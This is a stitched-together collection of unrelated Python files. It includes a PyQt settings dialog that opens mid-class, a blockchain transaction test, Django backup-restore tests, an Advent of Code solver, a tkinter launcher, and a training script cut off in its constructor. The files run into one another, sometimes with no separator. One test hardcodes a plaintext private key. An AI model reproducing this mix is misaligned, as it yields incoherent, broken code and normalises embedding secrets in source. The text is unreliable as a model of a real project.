        # Toolbar row: new / save / delete buttons plus the profile selector.
        top_left_side = QtWidgets.QHBoxLayout()
        new_file_icon = QIcon('designer_files/icon/plus-rectangle.svg')
        new_file = QtWidgets.QPushButton(new_file_icon, '')
        delete_file_icon = QIcon('designer_files/icon/trash.svg')
        delete_file = QtWidgets.QPushButton(delete_file_icon, '')
        save_file_icon = QIcon('designer_files/icon/save.svg')
        save_file = QtWidgets.QPushButton(save_file_icon, '')
        self.drop_down_list = QtWidgets.QComboBox()
        new_file.clicked.connect(self.create_new_setting)
        delete_file.clicked.connect(self.delete_setting)
        save_file.clicked.connect(self.save_setting)
        top_left_side.addWidget(new_file)
        top_left_side.addWidget(save_file)
        top_left_side.addWidget(delete_file)
        top_left_side.addWidget(self.drop_down_list)
        top_left_side.insertSpacing(-1, 20)
        # One stacked page per named setting profile.
        ls_settings = setting_obj.setting
        self.stacked_widget = QtWidgets.QStackedWidget()
        self.drop_down_list.currentIndexChanged.connect(
            self.stacked_widget.setCurrentIndex)
        for name, setting_dict in ls_settings.items():
            self.drop_down_list.addItem(name)
            widget = self.init_tab(setting_dict)
            self.stacked_widget.addWidget(widget)
        self.drop_down_list.setCurrentIndex(init_idx)
        # Keep the caller's combo box following this dialog's selection.
        self.drop_down_list.currentIndexChanged.connect(
            slave_cmb.setCurrentIndex)
        layout = QtWidgets.QVBoxLayout()
        layout.addLayout(top_left_side)
        layout.addWidget(self.stacked_widget)
        self.button_dialog = QDialogButtonBox(Qt.Horizontal)
        self.button_dialog.addButton(QDialogButtonBox.Apply)
        self.button_dialog.addButton(QDialogButtonBox.Ok)
        self.button_dialog.addButton(QDialogButtonBox.Cancel)
        self.button_dialog.clicked.connect(self.button_clicked)
        layout.addWidget(self.button_dialog)
        self.setLayout(layout)

    @pyqtSlot()
    def create_new_setting(self) -> None:
        """Clone the current profile under a user-supplied, non-duplicate name."""
        new_name, ok = QInputDialog.getText(
            self, 'New Setting', 'Enter new name:')
        idx = self.drop_down_list.currentIndex()
        is_duplicate = self.drop_down_list.findText(new_name) != -1
        if len(new_name) != 0 and ok and not is_duplicate:
            setting_dict = self.setting_obj.clone(idx, new_name)
            self.drop_down_list.addItem(new_name)
            widget = self.init_tab(setting_dict)
            self.stacked_widget.addWidget(widget)
            self.drop_down_list.setCurrentIndex(
                self.drop_down_list.count() - 1)
        elif len(new_name) == 0:
            msg_box = QMessageBox(self)
            msg_box.setText("Empty string, please specify name :")
            msg_box.exec()
        elif is_duplicate:
            # BUG FIX: user-facing message previously read "Deplicate".
            msg_box = QMessageBox(self)
            msg_box.setText("Duplicate string, please specify another name :")
            msg_box.exec()

    @pyqtSlot()
    def save_setting(self) -> None:
        """Persist the currently selected profile."""
        setting_idx = self.drop_down_list.currentIndex()
        self.setting_obj.save(setting_idx)

    @pyqtSlot()
    def delete_setting(self) -> None:
        """Remove the current profile and its page from the dialog."""
        setting_idx = self.drop_down_list.currentIndex()
        self.setting_obj.remove(setting_idx)
        self.drop_down_list.removeItem(setting_idx)
        widget = self.stacked_widget.widget(setting_idx)
        self.stacked_widget.removeWidget(widget)

    @pyqtSlot(QAbstractButton)
    def button_clicked(self, button: QAbstractButton) -> None:
        """Dispatch Apply / Ok / Cancel from the dialog button box."""
        role = self.button_dialog.buttonRole(button)
        if role == QDialogButtonBox.ApplyRole:
            self.apply_setting_signal.emit()
        elif role == QDialogButtonBox.AcceptRole:
            self.apply_setting_signal.emit()
            self.accept()
        elif role == QDialogButtonBox.RejectRole:
            self.reject()

    def init_tab(self, setting_dict: PrintSetting) -> QtWidgets.QWidget:
        """Build one profile page: a category list driving stacked section groups.

        Each SingleEntry attribute of setting_dict is placed into a
        category page and a section group box according to its `ui` metadata,
        and bound to apply_setting_signal so edits commit on Apply/Ok.
        """
        layout = QtWidgets.QHBoxLayout()
        menu_widget = QtWidgets.QListWidget()
        layout.addWidget(menu_widget)
        sub_stacked_page = QtWidgets.QStackedWidget()
        menu_widget.currentRowChanged.connect(sub_stacked_page.setCurrentIndex)
        layout.addWidget(sub_stacked_page)
        cat_frame = {}
        sec_frame = {}
        for entry in attr.asdict(setting_dict, recurse=False).values():
            if isinstance(entry, SingleEntry):
                cat = entry.ui['category']
                if not cat in cat_frame.keys():
                    # First entry of this category: create its page.
                    single_frame = QtWidgets.QWidget()
                    single_frame.setLayout(QtWidgets.QVBoxLayout())
                    cat_frame[cat] = single_frame
                    menu_widget.addItem(cat)
                    sec_frame[cat] = {}
                    sub_stacked_page.addWidget(single_frame)
                sec = entry.ui['section']
                if not sec in sec_frame[cat].keys():
                    # First entry of this section: create its group box.
                    box_layout = QtWidgets.QVBoxLayout()
                    qbox = QtWidgets.QGroupBox(sec)
                    qbox.setLayout(box_layout)
                    sec_frame[cat][sec] = qbox
                    cat_frame[cat].layout().addWidget(qbox)
                q_entry = entry.create_ui_entry()
                self.apply_setting_signal.connect(entry.commit_value)
                sec_frame[cat][sec].layout().addWidget(q_entry)
        widget = QtWidgets.QWidget()
        widget.setLayout(layout)
        return widget
|
#!/usr/bin/python3
import unittest
import time
import json
from deployutils.testnet import *
import deployutils.eehelper as ee
techKey ='5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3'
class EETestCase(unittest.TestCase):
    """End-to-end check that a pushed transaction is reported by the event engine."""
    def setUp(self):
        # Event-engine helper that records and matches emitted events.
        self.eeHelper = ee.EEHelper(self)
    def tearDown(self):
        self.eeHelper.tearDown()
    def test_userSendTransaction(self):
        """Push a cyber::checkwin action and verify the accept/apply/block events."""
        actor = 'tech'
        result = pushAction('cyber', 'checkwin', actor, [], keys=techKey)
        print("Pushed transaction with %s" % result['transaction_id'])
        self.assertEqual(result['processed']['receipt']['status'], 'executed')
        trx_id = result['transaction_id']
        block_num = result['processed']['block_num']
        # Expected shape of the action inside the accepted transaction.
        actionData = {
            "account": "cyber",
            "name": "checkwin",
            "authorization": [{"actor": actor, "permission": "active"}],
            "data": {},
        }
        actionTrx = {'actions':ee.AllItems(actionData)}
        # Expected action trace inside the ApplyTrx event.
        actionTrace = {
            "receiver": "cyber",
            "code": "cyber",
            "action": "checkwin",
            "auth": [{"actor": "tech", "permission": "active"}],
            "args": {},
            "events": []
        }
        # The three events must arrive in order: accept, apply (no exception),
        # then the block containing the executed transaction.
        self.eeHelper.waitEvents(
            [ ({'msg_type':'AcceptTrx', 'id':trx_id}, {'accepted':True, 'implicit':False, 'scheduled':False, 'trx':actionTrx}),
              ({'msg_type':'ApplyTrx', 'id':trx_id}, {'block_num':block_num, 'actions':ee.AllItems(actionTrace), 'except':ee.Missing()}),
              ({'msg_type':'AcceptBlock', 'block_num':block_num}, {'trxs':ee.Unorder({'id':trx_id, 'status':'executed'})})
            ], block_num)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from hwtBuildsystem.vivado.executor import VivadoExecutor
from hwtBuildsystem.vivado.part import XilinxPart
def importSampleBdProject(v: VivadoExecutor, part: str, tmpDir: str):
    """Create a fresh SampleBdProject in tmpDir and import the test1 board design.

    Any existing project with the same name is removed before creation.
    The TCL file is expected at tmpDir + 'test1.tcl'.
    """
    proj = v.project(tmpDir, "SampleBdProject")
    # Start from a clean slate if a previous run left a project behind.
    if proj._exists():
        proj._remove()
    proj.create()
    proj.setPart(part)
    board = proj.boardDesign("test1")
    # NOTE: `refrestTclIfExists` spelling comes from the library API.
    board.importFromTcl(tmpDir + 'test1.tcl', refrestTclIfExists=False)
if __name__ == "__main__":
    tmpDir = 'tmp/'
    pb = XilinxPart
    # Target device: Kintex-7 160T, ffg676 package, speed grade -2.
    part = XilinxPart(pb.Family.kintex7, pb.Size._160t, pb.Package.ffg676, pb.Speedgrade._2)
    with VivadoExecutor(logComunication=True) as v:
        importSampleBdProject(v, part, tmpDir)
        v.openGui()
|
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from app.core.config import settings
# Use a local on-disk SQLite database when running under the TEST deploy
# environment so tests never touch the configured database.
if os.environ.get("DEPLOY_ENV") == "TEST":
    engine = create_engine("sqlite:///test.db", pool_pre_ping=True)
else:
    engine = create_engine(settings.SQLALCHEMY_DATABASE_URI, pool_pre_ping=True)
# Session factory; pool_pre_ping above validates connections before checkout.
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
|
import subprocess
from mock import patch
from django.test import TestCase
from django.core.management.base import CommandError
from django.conf import settings
from django.utils import six
from dbbackup.management.commands.dbrestore import Command as DbrestoreCommand
from dbbackup.dbcommands import DBCommands
from dbbackup.tests.utils import FakeStorage, ENCRYPTED_FILE, TEST_DATABASE
from dbbackup.tests.utils import GPG_PRIVATE_PATH, DEV_NULL, COMPRESSED_FILE
@patch('dbbackup.management.commands.dbrestore.input', return_value='y')
class DbrestoreCommandRestoreBackupTest(TestCase):
    """Tests for Command.restore_backup using a fake storage backend.

    The class-level patch auto-answers the interactive confirmation prompt
    with 'y', so every test method receives the mock via *args.
    """
    def setUp(self):
        # Wire a command instance to the fake storage and test database.
        self.command = DbrestoreCommand()
        self.command.stdout = DEV_NULL
        self.command.uncompress = False
        self.command.decrypt = False
        self.command.backup_extension = 'bak'
        self.command.filepath = 'foofile'
        self.command.database = TEST_DATABASE
        self.command.dbcommands = DBCommands(TEST_DATABASE)
        self.command.passphrase = None
        self.command.storage = FakeStorage()
    def test_no_filepath(self, *args):
        # With no explicit filepath, the latest listed backup is used.
        self.command.storage.list_files = ['foo.bak']
        self.command.filepath = None
        self.command.restore_backup()
    def test_no_backup_found(self, *args):
        # No filepath and no stored backups must raise CommandError.
        self.command.filepath = None
        with self.assertRaises(CommandError):
            self.command.restore_backup()
    def test_uncompress(self, *args):
        # Restoring a compressed backup with uncompress enabled.
        self.command.storage.file_read = COMPRESSED_FILE
        self.command.filepath = COMPRESSED_FILE
        self.command.uncompress = True
        self.command.restore_backup()
    @patch('dbbackup.management.commands.dbrestore.getpass', return_value=None)
    def test_decrypt(self, *args):
        # GPG decryption path; only implemented on Python 2.
        if six.PY3:
            self.skipTest("Decryption isn't implemented in Python3")
        cmd = ('gpg --import %s' % GPG_PRIVATE_PATH).split()
        subprocess.call(cmd, stdout=DEV_NULL, stderr=DEV_NULL)
        self.command.decrypt = True
        self.command.restore_backup()
class DbrestoreCommandGetDatabaseTest(TestCase):
    """Tests for Command._get_database database-selection logic."""
    def setUp(self):
        self.command = DbrestoreCommand()
    def test_give_db_name(self):
        # An explicit database name resolves to that settings entry.
        db = self.command._get_database({'database': 'default'})
        self.assertEqual(db, settings.DATABASES['default'])
    def test_no_given_db(self):
        # With a single configured database, it is chosen implicitly.
        db = self.command._get_database({})
        self.assertEqual(db, settings.DATABASES['default'])
    @patch('django.conf.settings.DATABASES', {'db1': {}, 'db2': {}})
    def test_no_given_db_multidb(self):
        # Ambiguous with multiple databases and no explicit choice.
        with self.assertRaises(CommandError):
            self.command._get_database({})
class DbrestoreCommandGetExtensionTest(TestCase):
    """Tests for Command.get_extension filename-suffix handling."""
    def setUp(self):
        self.command = DbrestoreCommand()
    def test_tar(self):
        # A plain .tar archive reports its suffix.
        self.assertEqual(self.command.get_extension('foo.tar'), '.tar')
    def test_tar_gz(self):
        # Only the outermost suffix of a double extension is reported.
        self.assertEqual(self.command.get_extension('foo.tar.gz'), '.gz')
    def test_no_extension(self):
        # Filenames without a dot yield an empty extension.
        self.assertEqual(self.command.get_extension('foo'), '')
class DbrestoreCommandUncompressTest(TestCase):
    """Tests for Command.uncompress_file."""
    def setUp(self):
        self.command = DbrestoreCommand()
    def test_uncompress(self):
        # FIX: close the fixture file instead of leaking the handle
        # (the original never closed it, raising ResourceWarning).
        with open(COMPRESSED_FILE, 'rb') as inputfile:
            fd = self.command.uncompress_file(inputfile)
        fd.seek(0)
        self.assertEqual(fd.read(), b'foo\n')
class DbrestoreCommandDecryptTest(TestCase):
    """Tests for Command.unencrypt_file (GPG decryption, Python 2 only)."""
    def setUp(self):
        self.command = DbrestoreCommand()
        self.command.passphrase = None
        # Import the test private key so GPG can decrypt the fixture.
        cmd = ('gpg --import %s' % GPG_PRIVATE_PATH).split()
        subprocess.call(cmd, stdout=DEV_NULL, stderr=DEV_NULL)
    @patch('dbbackup.management.commands.dbrestore.input', return_value=None)
    @patch('dbbackup.management.commands.dbrestore.getpass', return_value=None)
    def test_decrypt(self, *args):
        if six.PY3:
            self.skipTest("Decryption isn't implemented in Python3")
        # FIX: close the fixture file instead of leaking the handle
        # (the original never closed it, raising ResourceWarning).
        with open(ENCRYPTED_FILE, 'r+b') as inputfile:
            uncryptfile = self.command.unencrypt_file(inputfile)
        uncryptfile.seek(0)
        self.assertEqual('foo\n', uncryptfile.read())
|
from django.contrib import admin
from django.urls import path
from django.contrib.auth import views as auth_views
from django.urls import reverse_lazy
from . import views
app_name = "players"
# URL routes for the players app; names are referenced as "players:<name>".
# NOTE(review): only the done/confirm/complete password-reset steps are routed
# here — the reset request form presumably lives elsewhere; confirm.
urlpatterns = [
    path('', views.home, name = 'home'),
    path('users/', views.users_list, name = 'users'),
    path('test/', views.test, name = 'testing'),
    path('scoreboard/', views.scoreboard, name = 'scoreboard'),
    path('registration/', views.register, name = 'registration'),
    path('challenges/', views.challenges, name = 'challenges'),
    path('login/', views.login_page, name = 'l'),
    path('logout/', views.logout_request, name = 'loggedout'),
    path('profile/', views.profile, name = 'profile'),
    path('dashboard/', views.author_dashboard, name = 'dash'),
    # Challenge authoring (add/edit/delete by challenge id).
    path('add_challenges/', views.challenge_form, name = 'add'),
    path('edit_challenges/<int:c_id>/', views.challenge_edit, name = 'edit'),
    path('delete_challenges/<int:c_id>/', views.challenge_delete, name = 'delete'),
    path('send_notification/', views.sending_notification, name='notification'),
    path('notifications/', views.view_notification, name='v_notification'),
    path('rules/', views.rules, name='rules'),
    path('update_rules/<int:id>', views.update_rules, name='update_rules'),
    path('individual_score/<int:p_id>/', views.individual_player_score, name='i_score'),
    path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(template_name='players/password/password_reset_done.html'), name='password_reset_done'),
    path('reset/<uidb64>/<token>/', auth_views.PasswordResetConfirmView.as_view(template_name="players/password/password_reset_confirm.html",success_url="/reset/done/"), name='password_reset_confirm'),
    path('reset/done/', auth_views.PasswordResetCompleteView.as_view(template_name='players/password/password_reset_complete.html'), name='password_reset_complete'),
]
|
# from Utility import Utility as utility
import pandas as pd
class Imbalanced:
    """Split an imbalanced dataset into several class-balanced chunks."""

    def __init__(self, data):
        # data: pandas DataFrame containing the target column.
        self.data = data

    def DivideAndConquer(self, target, minority_class, majority_class, n=5000):
        """Partition the majority class into chunks and pair each chunk
        with the full minority class.

        Parameters
        ----------
        target : str
            Name of the label column.
        minority_class, majority_class
            Values of `target` identifying the two classes.
        n : int
            Scaling factor controlling the majority chunk size.

        Returns
        -------
        list of pandas.DataFrame, each holding one majority chunk plus
        every minority row.

        Raises
        ------
        ValueError
            If the computed chunk size is not positive.
        """
        total = len(self.data)
        minority = self.data[self.data[target] == minority_class]
        majority = self.data[self.data[target] == majority_class]
        # Shuffle the majority rows deterministically before slicing.
        shuffled = majority.sample(n=len(majority), random_state=10)
        chunk_size = int(((len(majority) - len(minority)) / total) * n)
        if chunk_size <= 0:
            raise ValueError(
                "computed chunk size is not positive; increase n or check the class labels"
            )
        # BUG FIX: the original iterated int(len(majority)/chunk_size) times
        # over a boundary list that excluded len(majority), raising
        # IndexError when chunk_size divided the majority count exactly and
        # silently dropping the remainder rows otherwise. Appending the
        # final boundary keeps every majority row and removes the crash.
        boundaries = list(range(chunk_size, len(shuffled), chunk_size))
        boundaries.append(len(shuffled))
        datatable = []
        start = 0
        for end in boundaries:
            chunk = shuffled[start:end]
            datatable.append(pd.concat([chunk, minority], ignore_index=True))
            start = end
        return datatable
|
#################################################################
# test.py
# Author : %AUTHOR%
# Version : 1.0
# Date : %DATE%
# Description: Test Script
#################################################################
|
from .feature_params import FeatureParams
from .split_params import SplittingParams
from .train_params import TrainingParams
from .train_pipeline_params import (
read_training_pipeline_params,
TrainingPipelineParamsSchema,
TrainingPipelineParams,
)
from .model_params import (
read_model_logistic_regression_params,
read_model_decision_tree_classifier_params,
)
# Public re-export surface of the params package.
__all__ = [
    "FeatureParams",
    "SplittingParams",
    "TrainingPipelineParams",
    "TrainingPipelineParamsSchema",
    "TrainingParams",
    "read_training_pipeline_params",
    "read_model_logistic_regression_params",
    "read_model_decision_tree_classifier_params"
]
|
#
# Pybalone
#
# A Python implementation of the Abalone* board game
# Abalone is a registered trademark of Abalone S.A.
#
# github.com/marnovo
#
# Cell markers used by the board matrices below.
x = 9  # invalid spaces
b = 0  # empty board spaces
A = 1  # player 1/A/top
B = 2  # player 2/B/bottom
# Axial coordinates used as explained in:
# http://www.redblobgames.com/grids/hexagons/#coordinates-axial
# Stored as explained in:
# http://www.redblobgames.com/grids/hexagons/#map-storage
# An empty board: `x` pads the corners of the 9x9 grid that fall
# outside the hexagon (61 playable cells).
BOARD_ZERO = [
    [x, x, b, b, b, b, b, x, x],
    [x, x, b, b, b, b, b, b, x],
    [x, b, b, b, b, b, b, b, x],
    [x, b, b, b, b, b, b, b, b],
    [b, b, b, b, b, b, b, b, b],
    [x, b, b, b, b, b, b, b, b],
    [x, b, b, b, b, b, b, b, x],
    [x, x, b, b, b, b, b, b, x],
    [x, x, b, b, b, b, b, x, x],
]
# Standard starting layout: 14 marbles per player, A on top, B on bottom.
BOARD_INIT = [
    [x, x, A, A, A, A, A, x, x],
    [x, x, A, A, A, A, A, A, x],
    [x, b, b, A, A, A, b, b, x],
    [x, b, b, b, b, b, b, b, b],
    [b, b, b, b, b, b, b, b, b],
    [x, b, b, b, b, b, b, b, b],
    [x, b, b, B, B, B, b, b, x],
    [x, x, B, B, B, B, B, B, x],
    [x, x, B, B, B, B, B, x, x],
]
# The live board starts from the initial layout.
board = BOARD_INIT
|
"""title
https://adventofcode.com/2021/day/19
"""
import numpy as np
import pandas as pd
import itertools
import re
SMALL_INPUT = open('small_input.txt').read()
ORIENTATIONS = """
x, y, z
x, z,-y
x,-y,-z
x,-z, y
y,-x, z
y, z, x
y, x,-z
y,-z,-x
z, y,-x
z,-x,-y
z,-y, x
z, x, y
-x, y,-z
-x, z, y
-x,-y, z
-x,-z,-y
-y,-x,-z
-y, z,-x
-y, x, z
-y,-z, x
-z, y, x
-z,-x, y
-z,-y,-x
-z, x,-y
"""
ORIENTATIONS = re.findall(r'(.)(.),(.)(.),(.)(.)', ORIENTATIONS)
def parse(data):
    """Parse scanner blocks into {scanner index: sorted numpy coord array}."""
    blocks = data.strip().split('\n\n')
    result = {}
    for index, block in enumerate(blocks):
        triples = [
            [int(value) for value in triple]
            for triple in re.findall(r'(-?\d+),(-?\d+),(-?\d+)', block)
        ]
        # Sorting makes later anchor-based matching deterministic.
        triples.sort()
        result[index] = np.array(triples)
    return result
def get_axis(a, sign, axis):
    """Return the 'x'/'y'/'z' column of `a`, negated when sign is '-'."""
    factor = -1 if sign == '-' else 1
    return factor * a[:, 'xyz'.find(axis)]
def get_orientations(scanner):
    """Yield the scanner's coordinates in each of the 24 axis orientations."""
    for xsign, xaxis, ysign, yaxis, zsign, zaxis in ORIENTATIONS:
        rotated = np.zeros(scanner.shape, scanner.dtype)
        axes = ((xsign, xaxis), (ysign, yaxis), (zsign, zaxis))
        for column, (sign, axis) in enumerate(axes):
            rotated[:, column] = get_axis(scanner, sign, axis)
        yield rotated
def match(s1, s2):
    """Try to align s2 onto s1; return (translation, aligned s2) or (None, None).

    Only the last 10 points of s1 are tried as anchors: both arrays are
    sorted, so if the sets overlap in at least 12 points one of these
    anchors must correspond to some point of s2.
    """
    for anchor in s1[-10:]:
        for candidate in s2:
            offset = candidate - anchor
            shifted = s2 - offset
            stacked = np.vstack([s1, shifted])
            distinct = np.unique(stacked, axis=0)
            if stacked.shape[0] - distinct.shape[0] >= 12:
                aligned = pd.DataFrame(shifted).sort_values(by=0).values
                return offset, aligned
    return None, None
def match_pair(s1, s2):
    """Try every orientation of s2 against s1; return the first match.

    Returns (translation, aligned points) or (None, None) when no
    orientation overlaps in at least 12 points.
    """
    for oriented in get_orientations(s2):
        translation, aligned = match(s1, oriented)
        if translation is not None:
            return translation, aligned
    return None, None
def solve(data):
    """Align every scanner against the already-aligned set, dump the merged
    beacons to out.csv and scanner vectors to vectors.csv, and return the
    number of distinct beacons (the part-1 answer).

    Raises Exception when a pass over all pairs finds no new match.
    """
    scanners = parse(data)
    aligned = [0]            # scanner indices already placed in scanner-0 space
    vectors = [(0, 0, 0)]    # scanner positions relative to scanner 0
    checked = set()          # (aligned, candidate) pairs already compared
    while len(aligned) < len(scanners):
        print(f'{len(aligned)} / {len(scanners)} scanners matched')
        merge_found = False
        for s1, s2 in itertools.product(aligned, scanners):
            if (s1, s2) in checked or s2 in aligned:
                continue
            checked.add((s1, s2))
            print(f'comparing {s1} vs {s2}')
            vec, s2_trans = match_pair(scanners[s1], scanners[s2])
            if vec is not None:
                aligned.append(s2)
                vectors.append(vec)
                # Store the candidate in scanner-0 coordinates so later
                # scanners can be matched against it directly.
                scanners[s2] = s2_trans
                print('match found!\n')
                merge_found = True
                break
        if not merge_found:
            raise Exception("something went wrong")
    # FIX: removed a dead `df = pd.DataFrame(scanners[0])` that was
    # immediately overwritten below.
    a = np.vstack(list(scanners.values()))
    a = np.unique(a, axis=0)
    df = pd.DataFrame(a)
    df.sort_values(by=0, ascending=True).to_csv('out.csv', index=False)
    v = pd.DataFrame(vectors)
    v.to_csv('vectors.csv', index=False)
    return df.shape[0]
def solve2(fn):
    """Return the largest Manhattan distance between any two rows of CSV `fn`."""
    rows = pd.read_csv(fn).values
    largest = 0
    for first, second in itertools.combinations(rows, 2):
        distance = np.abs(first - second).sum()
        if distance > largest:
            largest = distance
    return largest
if __name__ == '__main__':
    # Part 1: align scanners from the real input and count distinct beacons.
    input_data = open('input_data.txt').read()
    #result = solve(SMALL_INPUT)
    result = solve(input_data)
    print(f'Example 1: {result}')
    # 355
    # Part 2: largest Manhattan distance between scanner positions, read
    # from the vectors CSV written by solve(). The first call's result is
    # immediately overwritten by the second.
    result = solve2('vectors_small.csv')
    result = solve2('vectors.csv')
    print(f'Example 2: {result}')
    # 10842
|
from setuptools import setup
# Packaging metadata for the genshinstats distribution.
setup(
    name='genshinstats',
    version='1.3.8.2',
    author='thesadru',
    packages=['genshinstats'],
    description="A python library that can get the stats of your or others' Genshin Impact account using Mihoyo's API.",
    keywords='wrapper-api genshin'.split(),
    python_requires='>=3.6',
    url='https://github.com/thesadru/genshinstats',
    install_requires=['requests'],
    author_email='thesadru@gmail.com',
    # README is read at build time and rendered as the PyPI long description.
    long_description=open('README.md').read(),
    long_description_content_type='text/markdown',
)
from time import sleep
import utils.show as show
import utils.file as file
def list():
    """Print the registry header and every stored person, then pause.

    NOTE: the name shadows the builtin `list`; it is kept unchanged for
    backward compatibility with existing callers.
    """
    info = 'People Registered'
    # FIX: was `fileExists is True`, an identity check against the True
    # singleton; plain truthiness is the intended test.
    if file.exists():
        show.header(info)
        file.read()
    sleep(2)
def register(name: str, age: int):
    """Append one person as a "name,age" line and pause briefly."""
    record = f'{name},{age}'
    file.write(record)
    sleep(2)
|
from .base_device import BaseDevice
import uuid
class Mower(BaseDevice):
    """Smart-system mower device exposing MOWER_CONTROL commands."""

    def __init__(self, smart_system, device_map):
        """Constructor for the mower device."""
        BaseDevice.__init__(self, smart_system, device_map["COMMON"][0]["id"])
        self.type = "MOWER"
        self.activity = "N/A"         # current activity reported by the service
        self.operating_hours = "N/A"  # accumulated operating hours
        self.state = "N/A"            # device state
        self.last_error_code = "N/A"  # last error reported by the mower
        self.mower_id = None          # id of the MOWER entry, set from device_map
        self.setup_values_from_device_map(device_map)

    def update_device_specific_data(self, device_map):
        """Copy mower-specific attributes from one device-map entry."""
        # Mower has only one item
        if device_map["type"] == "MOWER":
            self.mower_id = device_map["id"]
            self.set_attribute_value("activity", device_map, "activity")
            self.set_attribute_value("operating_hours", device_map, "operatingHours")
            self.set_attribute_value("state", device_map, "state")
            self.set_attribute_value("last_error_code", device_map, "lastErrorCode")

    def _send_command(self, attributes):
        """Send one MOWER_CONTROL payload; log an error if the id is unknown.

        Consolidates the four previously duplicated command methods.
        """
        if self.mower_id is None:
            self.smart_system.logger.error("The mower id is not defined")
            return
        data = {
            "id": str(uuid.uuid1()),
            "type": "MOWER_CONTROL",
            "attributes": attributes,
        }
        self.smart_system.call_smart_system_service(self.mower_id, data)

    def start_seconds_to_override(self, duration):
        """Mow for `duration` seconds, overriding the schedule."""
        self._send_command({"command": "START_SECONDS_TO_OVERRIDE", "seconds": duration})

    def start_dont_override(self, duration):
        """Send START_DONT_OVERRIDE (payload kept identical to the original,
        including the `seconds` field)."""
        self._send_command({"command": "START_DONT_OVERRIDE", "seconds": duration})

    def park_until_next_task(self):
        """Park the mower until the next scheduled task."""
        self._send_command({"command": "PARK_UNTIL_NEXT_TASK"})

    def park_until_further_notice(self):
        """Park the mower until further notice."""
        self._send_command({"command": "PARK_UNTIL_FURTHER_NOTICE"})
|
import tkinter as tk
class app(tk.Frame):
    """Launcher window with buttons for several sub-programs."""

    def __init__(self, i, master=None):
        super().__init__(master)
        self.master = master
        # Per-feature call counters, all seeded from `i`; each feature's
        # action only runs when its counter is non-zero.
        self.i = i
        self.i_2 = i
        self.i_3 = i
        self.pack()
        self.createWidgets()

    def createWidgets(self):
        """Build the single column of launcher buttons."""
        self.btnFrame = tk.Frame(self)
        self.btnpaint = tk.Button(self.btnFrame, text='Paint', command=self.paint)
        self.btnpaint_2 = tk.Button(self.btnFrame, text='Paint v2', command=self.paint_2)
        self.btnhome = tk.Button(self.btnFrame, text='Home stuff', command=self.home)
        self.btntextedit = tk.Button(self.btnFrame, text='text editer', command=self.text_edit)
        # BUG FIX: was `command=self.master.destroy()`, which destroyed the
        # window immediately while building the widgets; pass the bound
        # method so it only runs on click.
        self.btnclose = tk.Button(self.btnFrame, text='close', command=self.master.destroy)
        self.btns = [self.btnpaint, self.btnpaint_2, self.btnhome, self.btntextedit, self.btnclose]
        self.btnFrame.grid(row=0, column=0, sticky='ns')
        for row, button in enumerate(self.btns):
            button.grid(row=row, column=0, sticky='ew')

    def paint(self):
        """Launch the first paint program (skipped on the first call when seeded with 0)."""
        import Class_one
        if self.i != 0:
            Class_one.draw()
        self.i += 1

    def paint_2(self):
        """Launch the second paint program."""
        import class_2
        if self.i_2 != 0:
            class_2.paint()
        self.i_2 += 1

    def home(self):
        """Launch the homework extras."""
        import class_3_homework as class_3
        if self.i_3 != 0:
            class_3.extra()
        self.i_3 += 1

    def text_edit(self):
        """Open the text-editor window (Class_4.Application)."""
        import Class_4 as class_4
        self.df_save_loc = '/home/jonah/Thonny files/TXT_files/'  # change to folder name where you want auto saves as def
        self.df_name = 'testing'  # you can change the default save name
        self.root_2 = tk.Tk()
        self.root_2.title('Text Editer')
        self.root_2.rowconfigure(0, minsize=800, weight=1)
        self.root_2.columnconfigure(1, minsize=600, weight=1)
        # BUG FIX: the attributes were referenced without `self.`
        # (df_name, df_save_loc, root_2), raising NameError on click.
        self.app_2 = class_4.Application(self.df_name, self.df_save_loc, master=self.root_2)
        self.app_2.mainloop()
# Script entry point: build the root window and start the launcher.
root = tk.Tk()
i = 0
root.rowconfigure(0, minsize=9999, weight=1)
root.columnconfigure(1, minsize=9999, weight=1)
# FIX: the instance was previously bound to the name `app`, shadowing the
# class of the same name; renamed so the class stays accessible.
main_app = app(i, master=root)
main_app.mainloop()
import os
os.environ['FOR_DISABLE_CONSOLE_CTRL_HANDLER'] = 'T' # This is ot prevent to be called Fortran Ctrl+C crash in Windows.
import torch
import numpy as np
import logging, yaml, sys, argparse, math
from tqdm import tqdm
from collections import defaultdict
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from scipy.io import wavfile
from Modules import HifiSinger, Discriminators, Gradient_Penalty
from Datasets import Dataset, Inference_Dataset, Collater, Inference_Collater
from Radam import RAdam
from Noam_Scheduler import Modified_Noam_Scheduler
from Logger import Logger
from distributed import init_distributed, apply_gradient_allreduce, reduce_tensor
from Arg_Parser import Recursive_Parse
# Route INFO-level log records to stdout with timestamp/module/line context.
logging.basicConfig(
    level=logging.INFO, stream=sys.stdout,
    format= '%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s'
    )
class Trainer:
    def __init__(self, hp_path, steps= 0):
        """Set up datasets, models, checkpoint state and loggers.

        Args:
            hp_path: path to the YAML hyper-parameter file.
            steps: resume step; 0 means "load the newest checkpoint if any".
        """
        self.hp_Path = hp_path
        # Distributed rank / world size are taken from the environment.
        self.gpu_id = int(os.getenv('RANK', '0'))
        self.num_gpus = int(os.getenv("WORLD_SIZE", '1'))
        self.hp = Recursive_Parse(yaml.load(
            open(self.hp_Path, encoding='utf-8'),
            Loader=yaml.Loader
            ))
        if not torch.cuda.is_available():
            self.device = torch.device('cpu')
        else:
            self.device = torch.device('cuda:{}'.format(self.gpu_id))
            torch.backends.cudnn.enabled = True
            torch.backends.cudnn.benchmark = True
            # NOTE(review): pins every process to CUDA device 0 even though
            # self.device targets cuda:{gpu_id}; looks inconsistent for
            # multi-GPU runs — confirm whether set_device(self.gpu_id)
            # was intended.
            torch.cuda.set_device(0)
        self.steps = steps
        self.Datset_Generate()
        self.Model_Generate()
        self.Load_Checkpoint()
        self._Set_Distribution()
        # Per-phase running loss accumulators and tensorboard-style writers.
        self.scalar_Dict = {
            'Train': defaultdict(float),
            'Evaluation': defaultdict(float),
            }
        self.writer_Dict = {
            'Train': Logger(os.path.join(self.hp.Log_Path, 'Train')),
            'Evaluation': Logger(os.path.join(self.hp.Log_Path, 'Evaluation')),
            }
